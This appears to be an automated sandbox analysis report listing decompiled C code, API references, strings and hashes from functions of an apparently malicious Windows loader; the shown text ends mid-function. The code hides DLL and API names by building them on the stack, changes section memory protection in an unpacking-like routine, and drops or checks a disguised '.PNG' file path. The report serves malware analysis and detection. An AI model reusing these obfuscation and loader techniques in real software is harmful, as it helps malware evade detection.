			E00403140(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t79;
				_Unknown_base(*)()* _t85;
				signed char _t87;
				void* _t96;
				signed int _t103;
				signed int _t109;
				signed int _t114;
				intOrPtr* _t120;
				void* _t121;
				unsigned int _t123;
				long _t124;
				void* _t126;
				void* _t127;
				signed char* _t128;
				intOrPtr _t130;
				signed int _t132;

				_t79 =  *0x44f5d0; // 0x765b253d
				 *(_t132 + 0x3c) = _t79 ^ _t132;
				_t120 = __ecx;
				 *((char*)(_t132 + 0x21)) = 0x45;
				 *(_t132 + 0x24) = 0x45;
				_t82 =  *__ecx;
				 *((char*)(_t132 + 0x20)) = 0x4b;
				 *((char*)(_t132 + 0x22)) = 0x52;
				 *((char*)(_t132 + 0x23)) = 0x4e;
				 *((char*)(_t132 + 0x25)) = 0x4c;
				 *((char*)(_t132 + 0x26)) = 0x33;
				 *((char*)(_t132 + 0x27)) = 0x32;
				 *((char*)(_t132 + 0x28)) = 0x2e;
				 *((char*)(_t132 + 0x29)) = 0x64;
				 *((char*)(_t132 + 0x2a)) = 0x6c;
				 *((char*)(_t132 + 0x2b)) = 0x6c;
				 *((char*)(_t132 + 0x2c)) = 0;
				_t111 = _t132 + 0x30;
				_t126 = ( *( *__ecx + 0x14) & 0x0000ffff) + _t82 + 0x18;
				 *((intOrPtr*)(_t132 + 0x20)) = __ecx;
				 *((char*)(_t132 + 0x38)) = 0x56;
				 *((char*)(_t132 + 0x39)) = 0x69;
				 *((char*)(_t132 + 0x3a)) = 0x72;
				 *((char*)(_t132 + 0x3b)) = 0x74;
				 *(_t132 + 0x3c) = 0x75;
				 *((char*)(_t132 + 0x3d)) = 0x61;
				 *((char*)(_t132 + 0x3e)) = 0x6c;
				 *((char*)(_t132 + 0x3f)) = 0x46;
				 *((char*)(_t132 + 0x40)) = 0x72;
				 *((char*)(_t132 + 0x41)) = 0x65;
				 *((char*)(_t132 + 0x42)) = 0x65;
				 *((char*)(_t132 + 0x43)) = 0;
				_t85 = GetProcAddress(LoadLibraryA(_t132 + 0x24), _t132 + 0x30);
				_t130 =  *_t120;
				 *(_t132 + 0x14) = _t85;
				 *(_t132 + 0x10) = 0;
				if( *(_t130 + 6) <= 0) {
					L15:
					_pop(_t121);
					_pop(_t127);
					_pop(_t96);
					return E0042569C(_t85, _t96,  *(_t132 + 0x4c) ^ _t132, _t111, _t121, _t127);
				}
				_t128 = _t126 + 0x24;
				do {
					_t87 =  *_t128;
					_t103 = _t87 >> 0x0000001d & 0x00000001;
					_t114 = _t87 >> 0x0000001e & 0x00000001;
					_t123 = _t87 >> 0x1f;
					if((_t87 & 0x02000000) == 0) {
						__eflags = _t87 & 0x04000000;
						_t124 =  *(0x450914 + (_t123 + (_t114 + _t103 * 2) * 2) * 4);
						if((_t87 & 0x04000000) != 0) {
							_t124 = _t124 | 0x00000200;
							__eflags = _t124;
						}
						__eflags =  *(_t128 - 0x14);
						if(__eflags != 0) {
							L12:
							if(__eflags > 0) {
								 *((char*)(_t132 + 0x44)) = 0x56;
								 *((char*)(_t132 + 0x45)) = 0x69;
								 *((char*)(_t132 + 0x46)) = 0x72;
								 *((char*)(_t132 + 0x47)) = 0x74;
								 *((char*)(_t132 + 0x48)) = 0x75;
								 *((char*)(_t132 + 0x49)) = 0x61;
								 *((char*)(_t132 + 0x4a)) = 0x6c;
								 *((char*)(_t132 + 0x4b)) = 0x50;
								 *(_t132 + 0x4c) = 0x72;
								 *((char*)(_t132 + 0x4d)) = 0x6f;
								 *((char*)(_t132 + 0x4e)) = 0x74;
								 *((char*)(_t132 + 0x4f)) = 0x65;
								 *((char*)(_t132 + 0x50)) = 0x63;
								 *((char*)(_t132 + 0x51)) = 0x74;
								 *((char*)(_t132 + 0x52)) = 0;
								GetProcAddress(LoadLibraryA(_t132 + 0x24), _t132 + 0x3c);
								VirtualProtect( *(_t128 - 0x1c),  *(_t128 - 0x14), _t124, _t132 + 0x1c); // executed
							}
							goto L14;
						} else {
							__eflags = _t87 & 0x00000040;
							if((_t87 & 0x00000040) == 0) {
								__eflags = _t87;
								if(_t87 >= 0) {
									goto L14;
								}
								_t109 =  *(_t130 + 0x24);
								L11:
								__eflags = _t109;
								goto L12;
							}
							_t109 =  *(_t130 + 0x20);
							goto L11;
						}
					}
					VirtualFree( *(_t128 - 0x1c),  *(_t128 - 0x14), 0x4000);
					L14:
					_t130 =  *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x18))));
					_t111 =  *(_t130 + 6) & 0x0000ffff;
					_t85 =  *(_t132 + 0x10) + 1;
					_t128 =  &(_t128[0x28]);
					 *(_t132 + 0x10) = _t85;
				} while (_t85 < ( *(_t130 + 6) & 0x0000ffff));
				goto L15;
			}

0x00403143
0x0040314a
0x00403152
0x00403156
0x0040315a
0x0040315e
0x00403160
0x00403165
0x0040316a
0x0040316f
0x00403174
0x00403179
0x0040317e
0x00403183
0x00403188
0x0040318d
0x00403192
0x0040319b
0x0040319f
0x004031ab
0x004031af
0x004031b4
0x004031b9
0x004031be
0x004031c2
0x004031c7
0x004031cc
0x004031d1
0x004031d6
0x004031db
0x004031e0
0x004031e5
0x004031f1
0x004031f7
0x004031fe
0x00403202
0x0040320a
0x0040330b
0x0040330f
0x00403310
0x00403312
0x0040331d
0x0040331d
0x00403210
0x00403213
0x00403213
0x00403221
0x00403224
0x00403227
0x0040322f
0x00403247
0x00403252
0x00403259
0x0040325b
0x0040325b
0x0040325b
0x00403264
0x00403266
0x0040327a
0x0040327a
0x00403286
0x0040328b
0x00403290
0x00403295
0x00403299
0x0040329e
0x004032a3
0x004032a8
0x004032ad
0x004032b2
0x004032b7
0x004032bb
0x004032c0
0x004032c5
0x004032c9
0x004032d5
0x004032e9
0x004032e9
0x00000000
0x00403268
0x00403268
0x0040326a
0x00403271
0x00403273
0x00000000
0x00000000
0x00403275
0x00403278
0x00403278
0x00000000
0x00403278
0x0040326c
0x00000000
0x0040326c
0x00403266
0x0040323e
0x004032eb
0x004032ef
0x004032f5
0x004032f9
0x004032fc
0x00403301
0x00403301
0x00000000

APIs

LoadLibraryA.KERNEL32 ref: 004031EA
GetProcAddress.KERNEL32(00000000), ref: 004031F1
VirtualFree.KERNELBASE(?,?,00004000), ref: 0040323E
LoadLibraryA.KERNEL32 ref: 004032CE
GetProcAddress.KERNEL32(00000000), ref: 004032D5
VirtualProtect.KERNELBASE(?,?,00000000,?), ref: 004032E9

Strings

l, xrefs: 004032A3
a, xrefs: 0040329E
2, xrefs: 00403179
l, xrefs: 0040318D
l, xrefs: 004031CC
P, xrefs: 004032A8
o, xrefs: 004032B2
a, xrefs: 004031C7
e, xrefs: 004032BB
., xrefs: 0040317E
F, xrefs: 004031D1
V, xrefs: 004031AF
r, xrefs: 004031B9
d, xrefs: 00403183
V, xrefs: 00403286
u, xrefs: 004031C2
e, xrefs: 004031E0
R, xrefs: 00403165
L, xrefs: 0040316F
c, xrefs: 004032C0
r, xrefs: 004032AD
N, xrefs: 0040316A
i, xrefs: 0040328B
3, xrefs: 00403174
r, xrefs: 004031D6
l, xrefs: 00403188
u, xrefs: 00403299
K, xrefs: 00403160
i, xrefs: 004031B4
r, xrefs: 00403290
e, xrefs: 004031DB

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProcVirtual$FreeProtect
String ID: .$2$3$F$K$L$N$P$R$V$V$a$a$c$d$e$e$e$i$i$l$l$l$l$o$r$r$r$r$u$u
API String ID: 3873177194-742157370
Opcode ID: a98f27e7ffd4850d1b73dc38e316cacc3e96376bfd09aff315c911015ccc0366
Instruction ID: 0caa5cbf014bb98f41278f97c453236447b57da2c8002a1a4397e4c4787bb581
Opcode Fuzzy Hash: a98f27e7ffd4850d1b73dc38e316cacc3e96376bfd09aff315c911015ccc0366
Instruction Fuzzy Hash: F9516A7150C3C08EE311CB28C448B5BBFE56BA6709F48499DF1C85B282D7BAD618C76B

Uniqueness

Uniqueness Score: -1.00%

Function 00403BC0, Relevance: 52.6, APIs: 10, Strings: 20, Instructions: 142
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00403BC0(void* __ebp) {
				signed int _v4;
				signed int _v32;
				char _v280;
				char _v300;
				char _v524;
				char _v535;
				char _v536;
				char _v537;
				char _v538;
				char _v539;
				char _v540;
				char _v541;
				char _v542;
				char _v543;
				char _v544;
				char _v552;
				char _v556;
				char _v557;
				char _v558;
				char _v559;
				char _v560;
				char _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t38;
				struct HINSTANCE__* _t40;
				_Unknown_base(*)()* _t41;
				void* _t43;
				unsigned int _t44;
				int _t49;
				_Unknown_base(*)()* _t54;
				void* _t61;
				void* _t64;
				unsigned int _t65;
				void* _t69;
				void _t71;
				void _t72;
				signed int _t74;
				int _t77;
				char* _t79;
				void _t85;
				void _t86;
				signed int _t88;
				int _t91;
				void* _t98;
				void* _t102;
				void* _t104;
				void* _t108;
				void* _t110;
				signed int _t111;
				intOrPtr _t113;
				signed int _t114;

				_t38 =  *0x44f5d0; // 0x765b253d
				_v4 = _t38 ^ _t111;
				_t110 = LoadLibraryA;
				_v544 = 0x5c;
				_v543 = 0x53;
				_v542 = 0x56;
				_v541 = 0x50;
				_v540 = 0x37;
				_v539 = 0x2e;
				_v538 = 0x50;
				_v537 = 0x4e;
				_v536 = 0x47;
				_v535 = 0;
				_t40 = LoadLibraryA("Shell32.dll");
				_t69 = GetProcAddress;
				_t41 = GetProcAddress(_t40, "SHGetSpecialFolderPathA");
				 *_t41(0,  &_v524, 0x2e, 0); // executed
				_t43 =  &_v560;
				_t108 = _t43;
				do {
					_t71 =  *_t43;
					_t43 = _t43 + 1;
				} while (_t71 != 0);
				_t44 = _t43 - _t108;
				_t98 =  &(( &_v540)[0xffffffffffffffff]);
				do {
					_t72 =  *(_t98 + 1);
					_t98 = _t98 + 1;
				} while (_t72 != 0);
				_t74 = _t44 >> 2;
				_t77 = memcpy(_t98, _t108, _t74 << 2) & 0x00000003;
				memcpy(_t108 + _t74 + _t74, _t108, _t77);
				_t113 = _t111 + 0x18;
				_t102 = _t108 + _t77 + _t77;
				GetProcAddress(LoadLibraryA("SHLWAPI.dll"), "PathFileExistsA");
				_t49 = PathFileExistsA( &_v540); // executed
				if(_t49 != 0) {
					E00403AE0( &_v540);
				}
				GetProcAddress(LoadLibraryA("SHLWAPI.dll"), "PathRemoveFileSpecA");
				_t79 =  &_v540;
				PathRemoveFileSpecA(_t79); // executed
				_t54 = GetProcAddress(LoadLibraryA("KERNEL32.dll"), "GetModuleFileNameA");
				 *_t54(0,  &_v280, 0x104);
				_push(_t79);
				_t21 =  &_v560; // 0x47
				_v576 = _t113;
				_v560 = 0x53;
				_v559 = 0x56;
				_v558 = 0x50;
				_v557 = 0x37;
				_v556 = 0;
				E00401EE0(_t69, _t110, _t21);
				_push(_t113);
				_t96 =  &_v556;
				_v580 = _t113;
				E00401EE0(_t69, _t110,  &_v556);
				_push(_t113);
				_v584 = _t113;
				E00401EE0(_t69, _t110,  &_v300);
				_t61 = E004029C0( &_v556);
				_t114 = _t113 + 0xc;
				if(_t61 != 0) {
					_t64 =  &_v572;
					_t96 = _t64;
					do {
						_t85 =  *_t64;
						_t64 = _t64 + 1;
					} while (_t85 != 0);
					_t65 = _t64 - _t96;
					_t104 =  &_v552 + 0xffffffff;
					do {
						_t86 =  *(_t104 + 1);
						_t104 = _t104 + 1;
					} while (_t86 != 0);
					_t88 = _t65 >> 2;
					_t108 = _t96;
					_t91 = memcpy(_t104, _t108, _t88 << 2) & 0x00000003;
					memcpy(_t108 + _t88 + _t88, _t108, _t91);
					_t114 = _t114 + 0x18;
					_t102 = _t108 + _t91 + _t91;
					E00403AE0( &_v552);
				}
				return E0042569C(0, _t69, _v32 ^ _t114, _t96, _t102, _t108);
			}

0x00403bc6
0x00403bcd
0x00403bd6
0x00403be8
0x00403bed
0x00403bf2
0x00403bf7
0x00403bfc
0x00403c01
0x00403c06
0x00403c0b
0x00403c10
0x00403c15
0x00403c1a
0x00403c1c
0x00403c23
0x00403c30
0x00403c32
0x00403c36
0x00403c38
0x00403c38
0x00403c3a
0x00403c3d
0x00403c45
0x00403c47
0x00403c50
0x00403c50
0x00403c53
0x00403c56
0x00403c5c
0x00403c68
0x00403c70
0x00403c70
0x00403c70
0x00403c75
0x00403c7c
0x00403c80
0x00403c87
0x00403c87
0x00403c99
0x00403c9b
0x00403ca0
0x00403caf
0x00403cc0
0x00403cc2
0x00403cc3
0x00403cc9
0x00403cce
0x00403cd3
0x00403cd8
0x00403cdd
0x00403ce2
0x00403ce7
0x00403cec
0x00403ced
0x00403cf3
0x00403cf8
0x00403cfd
0x00403d07
0x00403d0c
0x00403d11
0x00403d16
0x00403d1b
0x00403d1d
0x00403d21
0x00403d23
0x00403d23
0x00403d25
0x00403d28
0x00403d30
0x00403d32
0x00403d35
0x00403d35
0x00403d38
0x00403d3b
0x00403d41
0x00403d44
0x00403d4a
0x00403d4d
0x00403d4d
0x00403d4d
0x00403d54
0x00403d54
0x00403d73

APIs

LoadLibraryA.KERNEL32 ref: 00403C1A
GetProcAddress.KERNEL32(00000000), ref: 00403C23
LoadLibraryA.KERNEL32(SHLWAPI.dll,PathFileExistsA), ref: 00403C72
GetProcAddress.KERNEL32(00000000), ref: 00403C75
PathFileExistsA.KERNELBASE(?), ref: 00403C7C
LoadLibraryA.KERNEL32(SHLWAPI.dll,PathRemoveFileSpecA), ref: 00403C96
GetProcAddress.KERNEL32(00000000), ref: 00403C99
PathRemoveFileSpecA.KERNELBASE(?), ref: 00403CA0
LoadLibraryA.KERNEL32(KERNEL32.dll,GetModuleFileNameA), ref: 00403CAC
GetProcAddress.KERNEL32(00000000), ref: 00403CAF

Strings

P, xrefs: 00403C06
S, xrefs: 00403CCE
7, xrefs: 00403CDD
PathRemoveFileSpecA, xrefs: 00403C8C
GetModuleFileNameA, xrefs: 00403CA2
SHLWAPI.dll, xrefs: 00403C6B, 00403C91
GNP., xrefs: 00403CC3, 00403CCD
P, xrefs: 00403BF7
S, xrefs: 00403BED
V, xrefs: 00403CD3
Shell32.dll, xrefs: 00403BE3
7, xrefs: 00403BFC
., xrefs: 00403C01
P, xrefs: 00403CD8
PathFileExistsA, xrefs: 00403C63
V, xrefs: 00403BF2
N, xrefs: 00403C0B
KERNEL32.dll, xrefs: 00403CA7
SHGetSpecialFolderPathA, xrefs: 00403BDE
\, xrefs: 00403BE8

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc$FilePath$ExistsRemoveSpec
String ID: .$7$7$GNP.$GetModuleFileNameA$KERNEL32.dll$N$P$P$P$PathFileExistsA$PathRemoveFileSpecA$S$S$SHGetSpecialFolderPathA$SHLWAPI.dll$Shell32.dll$V$V$\
API String ID: 1620757711-447970387
Opcode ID: 09f3807aaf29c328bcb1a62ecaabd20f36890bb811c052615ffb70d7f6c89350
Instruction ID: e515ebb8736f0e1bc8facc74ac7d5c84cfb588640560cab08e2dca4c86fde320
Opcode Fuzzy Hash: 09f3807aaf29c328bcb1a62ecaabd20f36890bb811c052615ffb70d7f6c89350
Instruction Fuzzy Hash: B841B3712083805BE310DB74DC55BAFBFD59F89348F440A1DF499672C1D6B9D608C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 004165BB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 106
filestringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004165BB(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				void* _t26;
				void* _t28;
				void* _t39;
				long _t43;
				CHAR* _t46;
				void* _t47;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t64;
				signed int _t66;
				void* _t68;

				_t57 = __edx;
				_t66 = _t68 - 0x90;
				_t19 =  *0x44f5d0; // 0x765b253d
				 *(_t66 + 0x8c) = _t19 ^ _t66;
				_t46 =  *(_t66 + 0x98);
				_t59 = __ecx;
				E004162F0(__ecx);
				_t75 = _t46;
				if(_t46 != 0) {
					__eflags = lstrlenA(_t46) - 0x104;
					if(__eflags < 0) {
						goto L2;
					} else {
						_push(0xa0);
						goto L6;
					}
				} else {
					_t46 = 0x43eff0;
					L2:
					 *(_t59 + 8) = E0040A3C7(_t75, 0x140);
					E0040AA60(_t57, _t66, _t23 + 0x2c, 0x104, _t46);
					_t26 = FindFirstFileA(_t46,  *(_t59 + 8)); // executed
					 *(_t59 + 0xc) = _t26;
					if(_t26 != 0xffffffff) {
						_t49 = _t59 + 0x10;
						 *((intOrPtr*)(_t66 - 0x7c)) = _t59 + 0x10;
						 *((intOrPtr*)(_t66 - 0x78)) = E0040E857(_t46, _t59 + 0x10, _t66, 0x104);
						_t28 = E00429AC6(_t59 + 0x10, _t57, _t27, _t46, 0x104);
						__eflags = _t28;
						if(_t28 != 0) {
							E004054F0(E00429396(_t49, _t57,  *((intOrPtr*)(_t66 - 0x78)), _t66 - 0x80, 3, _t66 - 0x74, 0x100, 0, 0, 0, 0));
							E004054F0(E004295B7(_t49, _t57,  *((intOrPtr*)(_t66 - 0x78)), 0x104, _t66 - 0x80, _t66 - 0x74, 0, 0));
							E0040D723(_t46,  *((intOrPtr*)(_t66 - 0x7c)), 0, _t66, 0xffffffff);
							_t39 = 1;
							__eflags = 1;
						} else {
							L00401D20(_t46,  *((intOrPtr*)(_t66 - 0x7c)), _t59, _t66, _t28);
							E004162F0(_t59);
							_push(0x7b);
							goto L6;
						}
					} else {
						_t43 = GetLastError();
						E004162F0(_t59);
						_push(_t43);
						L6:
						SetLastError();
						_t39 = 0;
					}
				}
				_pop(_t61);
				_pop(_t64);
				_pop(_t47);
				return E0042569C(_t39, _t47,  *(_t66 + 0x8c) ^ _t66, _t57, _t61, _t64);
			}

0x004165bb
0x004165bc
0x004165c9
0x004165d0
0x004165d7
0x004165df
0x004165e1
0x004165e6
0x004165ed
0x0041663a
0x0041663c
0x00000000
0x0041663e
0x0041663e
0x00000000
0x0041663e
0x004165ef
0x004165ef
0x004165f4
0x004165ff
0x00416607
0x00416613
0x0041661c
0x0041661f
0x0041664d
0x00416651
0x0041665c
0x0041665f
0x00416667
0x00416669
0x0041669d
0x004166b9
0x004166c4
0x004166cb
0x004166cb
0x0041666b
0x0041666f
0x00416676
0x0041667b
0x00000000
0x0041667b
0x00416621
0x00416621
0x0041662b
0x00416630
0x00416643
0x00416643
0x00416649
0x00416649
0x0041661f
0x004166d2
0x004166d3
0x004166d6
0x004166e3

APIs

FindFirstFileA.KERNELBASE(?,?,?,?,?), ref: 00416613
GetLastError.KERNEL32(?,?,?), ref: 00416621
lstrlenA.KERNEL32(?,?,?), ref: 00416634
SetLastError.KERNEL32(0000007B,00000000,?,?,00000104,?,?,?), ref: 00416643

Part of subcall function 0040A3C7: _malloc.LIBCMT ref: 0040A3E1

Part of subcall function 0040AA60: _strcpy_s.LIBCMT ref: 0040AA6C

__fullpath.LIBCMT ref: 0041665F
__splitpath_s.LIBCMT ref: 00416697
__makepath_s.LIBCMT ref: 004166B0

Strings

*.*, xrefs: 004165EF, 004165FE, 00416612

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$FileFindFirst__fullpath__makepath_s__splitpath_s_malloc_strcpy_slstrlen
String ID: *.*
API String ID: 23357613-438819550
Opcode ID: ab3d4d31e323d34e6fdc7794e1343755ab2062fa98989214a2497f544e362d15
Instruction ID: 6c284f8837f1028b42c2b70b37470a79ba50a60f33e4c7947cf996f8d2d32e74
Opcode Fuzzy Hash: ab3d4d31e323d34e6fdc7794e1343755ab2062fa98989214a2497f544e362d15
Instruction Fuzzy Hash: 8F31D472A002046BDB20BBB79C45EEFBA6CAF48314F10443EF515E3182DE78D544CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00402490, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101
fileCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00402490(signed int __edx, void* __eflags, intOrPtr* _a4) {
				char _v8;
				char _v16;
				signed int _v24;
				struct _WIN32_FIND_DATAA _v352;
				char _v356;
				CHAR* _v360;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t29;
				signed int _t31;
				void* _t37;
				void* _t40;
				char* _t43;
				void* _t45;
				intOrPtr* _t47;
				void* _t55;
				void* _t56;
				intOrPtr _t57;
				signed int _t61;
				signed int _t70;
				void* _t75;
				CHAR* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t82;
				void* _t84;
				signed int _t85;
				signed int _t87;
				signed int _t88;

				_t70 = __edx;
				_push(0xffffffff);
				_push(E0043BA56);
				_push( *[fs:0x0]);
				_t87 = (_t85 & 0xfffffff8) - 0x158;
				_t29 =  *0x44f5d0; // 0x765b253d
				_v24 = _t29 ^ _t87;
				_push(_t55);
				_push(_t75);
				_t31 =  *0x44f5d0; // 0x765b253d
				_push(_t31 ^ _t87);
				 *[fs:0x0] =  &_v16;
				_t37 = E00405460(_t84,  *_a4 - 0x10);
				_t88 = _t87 + 4;
				_v356 = _t37 + 0x10;
				_v8 = 0;
				_t40 = E00403E30( &_v352, 1);
				_v16 = 1;
				_t56 = E00403EB0(_t55, _t75, _t40, _t84);
				_v16 = 0;
				_t43 =  &(_v360[0xfffffffffffffff0]);
				asm("lock xadd [ecx], edx");
				if((_t70 | 0xffffffff) - 1 <= 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *( *_t43) + 4))))(_t43);
				}
				if(_t56 != 0) {
					E00403D80(_t56,  &_v356, 0x442b54);
				}
				E00403D80(_t56,  &_v356, "*.*");
				_t76 = _v360;
				_t81 = 0; // executed
				_t45 = FindFirstFileA(_t76,  &_v352); // executed
				_t61 = _v352.dwFileAttributes;
				if(_t45 == 0xffffffff || (_t61 & 0x00000010) == 0) {
					if((_t61 & 0x00000020) != 0) {
						goto L7;
					}
				} else {
					L7:
					_t81 = 1;
				}
				FindClose(_t45); // executed
				_t47 = _t76 - 0x10;
				_v8 = 0xffffffff;
				_t73 = _t47 + 0xc;
				asm("lock xadd [edx], ecx");
				if((_t61 | 0xffffffff) - 1 <= 0) {
					_t73 =  *((intOrPtr*)( *_t47));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t47)) + 4))))(_t47);
				}
				 *[fs:0x0] = _v16;
				_pop(_t77);
				_pop(_t82);
				_pop(_t57);
				return E0042569C(_t81, _t57, _v24 ^ _t88, _t73, _t77, _t82);
			}

0x00402490
0x00402496
0x00402498
0x004024a3
0x004024a4
0x004024aa
0x004024b1
0x004024b8
0x004024ba
0x004024bb
0x004024c2
0x004024ca
0x004024d9
0x004024e1
0x004024e4
0x004024f3
0x004024fe
0x00402505
0x00402512
0x00402514
0x00402520
0x00402529
0x00402530
0x0040253a
0x0040253a
0x0040253e
0x00402549
0x00402549
0x00402557
0x0040255c
0x00402566
0x00402568
0x00402571
0x00402575
0x0040257f
0x00000000
0x00000000
0x00402581
0x00402581
0x00402581
0x00402581
0x00402587
0x0040258d
0x00402590
0x0040259b
0x004025a1
0x004025a8
0x004025ac
0x004025b2
0x004025b2
0x004025bd
0x004025c5
0x004025c6
0x004025c7
0x004025d9

APIs

FindFirstFileA.KERNELBASE(?,?,*.*), ref: 00402568
FindClose.KERNELBASE(00000000), ref: 00402587

Strings

*.*, xrefs: 0040254E

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID: *.*
API String ID: 2295610775-438819550
Opcode ID: 2d7558c4d10db78adde0686bd08c9db947482bd746bb880bf3830aaf75ecc7f0
Instruction ID: cfd477120de95ae1392c7d0fd7c52b7e22c4f6f7addd68228c5d2991b653ee19
Opcode Fuzzy Hash: 2d7558c4d10db78adde0686bd08c9db947482bd746bb880bf3830aaf75ecc7f0
Instruction Fuzzy Hash: DF31BD71204B419FD310CF28CC56B9BB7E8EB85324F444B2AE4A99B3D1DB74A805CB89

Uniqueness

Uniqueness Score: -1.00%

Function 004038B0, Relevance: 87.7, APIs: 10, Strings: 40, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E004038B0(intOrPtr* __edi, void* __ebp) {
				signed int _v4;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				void* _v76;
				void* __ebx;
				void* __esi;
				signed int _t88;
				_Unknown_base(*)()* _t97;
				_Unknown_base(*)()* _t101;
				struct HINSTANCE__** _t108;
				intOrPtr _t111;
				void* _t113;
				void* _t118;
				intOrPtr _t124;
				intOrPtr* _t127;
				void* _t131;
				void* _t132;
				signed int _t134;

				_t131 = __ebp;
				_t127 = __edi;
				_t134 =  &_v76;
				_t88 =  *0x44f5d0; // 0x765b253d
				_t89 = _t88 ^ _t134;
				_v4 = _t88 ^ _t134;
				_t128 = 0;
				if(__edi != 0) {
					if( *((intOrPtr*)(__edi + 0x10)) != 0) {
						_t111 =  *((intOrPtr*)(__edi + 4));
						_push(0);
						_push(0);
						_push(_t111);
						 *((intOrPtr*)( *((intOrPtr*)( *__edi + 0x28)) + _t111))();
						 *((intOrPtr*)(__edi + 0x10)) = 0;
					}
					_push(_t113);
					_v71 = 0x45;
					_v68 = 0x45;
					_push(_t131);
					_t132 = GetProcAddress;
					_v72 = 0x4b;
					_v70 = 0x52;
					_v69 = 0x4e;
					_v67 = 0x4c;
					_v66 = 0x33;
					_v65 = 0x32;
					_v64 = 0x2e;
					_v63 = 0x64;
					_v62 = 0x6c;
					_v61 = 0x6c;
					_v60 = 0;
					if( *((intOrPtr*)(_t127 + 8)) != _t128) {
						_v40 = 0x4c;
						_v44 = 0x46;
						_v43 = 0x72;
						_v42 = 0x65;
						_v41 = 0x65;
						_v39 = 0x69;
						_v38 = 0x62;
						_v37 = 0x72;
						_v36 = 0x61;
						_v35 = 0x72;
						_v34 = 0x79;
						_v33 = 0;
						_v76 = GetProcAddress(LoadLibraryA( &_v72),  &_v44);
						if( *((intOrPtr*)(_t127 + 0xc)) > _t128) {
							do {
								_t124 =  *((intOrPtr*)(_t127 + 8));
								_t108 = _t124 + _t128 * 4;
								if( *(_t124 + _t128 * 4) != 0xffffffff) {
									FreeLibrary( *_t108);
								}
								_t128 = _t128 + 1;
							} while (_t128 <  *((intOrPtr*)(_t127 + 0xc)));
